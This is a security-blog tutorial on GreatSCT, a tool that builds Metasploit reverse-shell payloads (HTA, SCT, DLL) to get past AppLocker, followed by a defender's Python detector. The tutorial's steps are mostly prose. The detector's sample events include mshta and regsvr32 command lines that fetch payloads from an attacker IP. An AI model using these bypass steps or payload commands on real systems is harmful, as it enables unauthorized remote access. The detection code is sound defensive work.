GreatSct – An Application Whitelist Bypass Tool

While writing the AppLocker bypass series, we came across a new tool designed specifically for bypassing application whitelisting. So I decided to write this article introducing another interesting tool, "GreatSCT – A Metasploit payload generator". It is similar to Unicorn or msfvenom in that it relies on the Metasploit framework to provide a reverse connection from the victim's machine. Let's begin the tutorial and check its functionality.

Table of Content

  • GreatSCT
  • Installation & Usages
  • Generate malicious hta file
  • Generate malicious sct file
  • Generate malicious dll file

GreatSCT

GreatSCT is currently maintained by @ConsciousHacker; the project is called Great SCT (Great Scott). Great SCT is an open source project for generating application whitelist bypasses. The tool is intended for BOTH red and blue teams. It is designed to generate Metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions.

You can download it from here: https://github.com/GreatSCT/GreatSCT

Installation & Usages

Great SCT must first be downloaded and installed before it can be used. Run the following command to download Great SCT from GitHub; the setup also takes care of its dependencies during installation.

It helps bypass AppLocker policy by abusing the following Windows binaries:

  • Installutil.exe : The Installer tool is a command-line tool that lets you install and uninstall server resources in specific assemblies by running the installer components.
  • Msbuild.exe : The Microsoft Build Engine, also known as MSBuild, is a platform for building applications.
  • Mshta.exe : Mshta.exe runs the Microsoft HTML Application Host, the Windows utility responsible for running HTA (HTML Application) files. HTA files are HTML files that can run JavaScript or VBScript.
  • Regasm.exe : The Assembly Registration tool reads the metadata within an assembly and adds the necessary entries to the registry, which allows COM clients to create .NET Framework classes transparently.
  • Regsvcs.exe : RegSvcs stands for Microsoft .NET Remote Registry Services; it is known as the .NET Services Installation tool.
  • Regsvr32.exe : Regsvr32 is a command-line utility for registering and unregistering OLE controls, such as DLLs and ActiveX controls, in the Windows Registry.

Once it’s downloaded, type the following command to access the help commands:

Now, to get the list of payloads, type:

Generate malicious hta file 

Now, from the list of payloads, you can choose any one for your desired attack. For this attack we will use:

Once the command is executed, type:

After executing the generate command, it asks which method you want to use. As we will use msfvenom, type 1 to choose the first option. Then press Enter to accept meterpreter. Then supply the lhost and lport, i.e. 192.168.1.107 and 4321 respectively.

When generating the shellcode, it will ask you to give a name for the payload. By default it will use 'payload' as the name. As I didn't want to give any name, I simply pressed Enter.

It now creates two files: a resource file and an hta file.

First, start the Python HTTP server in /usr/share/greatsct-output by typing:

Now execute the hta file from the command prompt of the victim's PC.

Simultaneously, start the multi/handler using the resource file. For this, type:

And voila! You have your session.

Visit "Bypass Application Whitelisting using mshta.exe (Multiple Methods)" to learn more about mshta.exe techniques.

Generate malicious sct file 

Now, from the list of payloads, you can choose any one for your desired attack. For this attack we will use:

Once the command is executed, type:

It will then ask you for a payload. Just press Enter, as it will take windows/meterpreter/reverse_tcp as the default payload, and that is the one we need. After that, provide the IP (here we have given 192.168.1.107) and then any port; as you can see in the image below, we have given the lport as 2345.

After giving the details, it will ask for a name for your malware. By default it will set the name 'payload', so you can either give a name or just press Enter for the default settings.

As soon as you press Enter it will generate two files: a resource file and a .sct file. Now start the Python HTTP server in /usr/share/greatsct-output by typing:

Now execute the .sct file from the Run window of the victim's PC, as shown below.

Simultaneously, start the multi/handler using the resource file. For this, type:

And voila! You have your session.

Visit "Bypass Application Whitelisting using regsrv32.exe (Multiple Methods)" to learn more about regsvr32.exe techniques.

Generate malicious dll file 

Now, from the list of payloads, you can choose any one for your desired attack. For this attack we will use:

Once the command is executed, type:

After giving the details, it will ask for a name for your malware. By default it will set the name 'payload', so you can either give a name or just press Enter for the default settings.

As soon as you press Enter it will generate two files: a resource file and a .dll file.

Now start the Python HTTP server in /usr/share/greatsct-output by typing:

Now place the generated dll file inside C:\Windows\Microsoft.NET\Framework\v4.0.30319 and then execute the .dll file from the Run window of the victim's PC, as shown below:

Simultaneously, start the multi/handler using the resource file. For this, type:

And voila! You have your session.
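For the blue-team reader the tool is aimed at, the six binaries listed under "Installation & Usages" and the three walkthroughs above share a small telemetry footprint: mshta.exe or regsvr32.exe launched with a remote URL or an .hta/.sct argument, a .NET utility (regasm.exe, regsvcs.exe, installutil.exe) started interactively from the Run window, and a fresh DLL dropped into the .NET Framework directory. The following Python is an added detection example written for this article, not GreatSCT's own code. The event records are constructed here and loosely follow Sysmon-style ProcessCreate (ID 1) and FileCreate (ID 11) field names; those field names, the interactive-parent set and the trusted-writer allowlist are assumptions to tune per environment.

```python
"""Flag process launches and file writes matching the AppLocker-bypass patterns
in the GreatSCT walkthrough. Added defender-side example; not GreatSCT code.
Field names (Image, CommandLine, ParentImage, TargetFilename) are assumptions
modelled on Sysmon events; sample records below are constructed."""
import re
from typing import Dict, List, Tuple

# The Windows binaries the article lists as whitelist-bypass vectors.
LOLBINS = {"installutil.exe", "msbuild.exe", "mshta.exe",
           "regasm.exe", "regsvcs.exe", "regsvr32.exe"}
# Utilities that take an assembly path; the DLL walkthrough targets these.
DOTNET_UTILS = {"installutil.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe"}
# Parents indicating a hands-on launch (Run dialog, shell) rather than a build/installer (assumption).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# Directory the walkthrough stages its DLL in, lowercased for comparison.
DOTNET_FRAMEWORK_DIR = r"c:\windows\microsoft.net\framework\v4.0.30319"
# Processes expected to write there; constructed allowlist, tune per environment.
TRUSTED_FRAMEWORK_WRITERS = {"msiexec.exe", "tiworker.exe", "trustedinstaller.exe", "ngen.exe"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
SCRIPTLET_RE = re.compile(r"\.(?:hta|sct)\b", re.IGNORECASE)


def _basename(path: str) -> str:
    """Lowercased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_create(event: Dict[str, object]) -> List[str]:
    """Return reasons a ProcessCreate event is suspicious; empty list means benign."""
    image = _basename(str(event.get("Image", "")))
    if image not in LOLBINS:
        return []
    cmd = str(event.get("CommandLine", ""))
    parent = _basename(str(event.get("ParentImage", "")))
    reasons: List[str] = []
    url = URL_RE.search(cmd)
    if url:
        reasons.append(f"{image} fetching remote content: {url.group(0)}")
    if SCRIPTLET_RE.search(cmd):
        reasons.append(f"{image} given an HTA/SCT scriptlet argument")
    if image in DOTNET_UTILS and parent in INTERACTIVE_PARENTS:
        reasons.append(f"{image} launched interactively from {parent}")
    return reasons


def check_file_create(event: Dict[str, object]) -> List[str]:
    """Flag a DLL written into the .NET Framework directory by an unexpected process."""
    target = str(event.get("TargetFilename", "")).lower()
    writer = _basename(str(event.get("Image", "")))
    if (target.startswith(DOTNET_FRAMEWORK_DIR + "\\") and target.endswith(".dll")
            and writer not in TRUSTED_FRAMEWORK_WRITERS):
        return [f"{writer} wrote {target} into the .NET Framework directory"]
    return []


def scan(events: List[Dict[str, object]]) -> List[Tuple[int, List[str]]]:
    """Run the matching check per event type; return (index, reasons) for each hit."""
    hits = []
    for i, ev in enumerate(events):
        reasons = check_process_create(ev) if ev.get("EventID") == 1 else (
            check_file_create(ev) if ev.get("EventID") == 11 else [])
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample telemetry: the three walkthroughs plus two benign events.
# Command lines are abbreviated; only the URL/extension/parent matter to the rules.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://192.168.1.107/payload.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe http://192.168.1.107/payload.sct",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe",
     "CommandLine": r"regasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\payload.dll",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\payload.dll"},
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.csproj",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\devenv.exe"},
    {"EventID": 11, "Image": r"C:\Windows\WinSxS\TiWorker.exe",
     "TargetFilename": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll"},
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(why))
```

The interactive-parent heuristic matters for the DLL case: staging the assembly under the .NET Framework directory defeats a path-based rule because that path is trusted by the default AppLocker rules, so the check pivots to how regasm.exe was started instead of where its input came from. The FileCreate rule catches the staging step itself, before any handler connects back.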

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a lover of social media and gadgets.
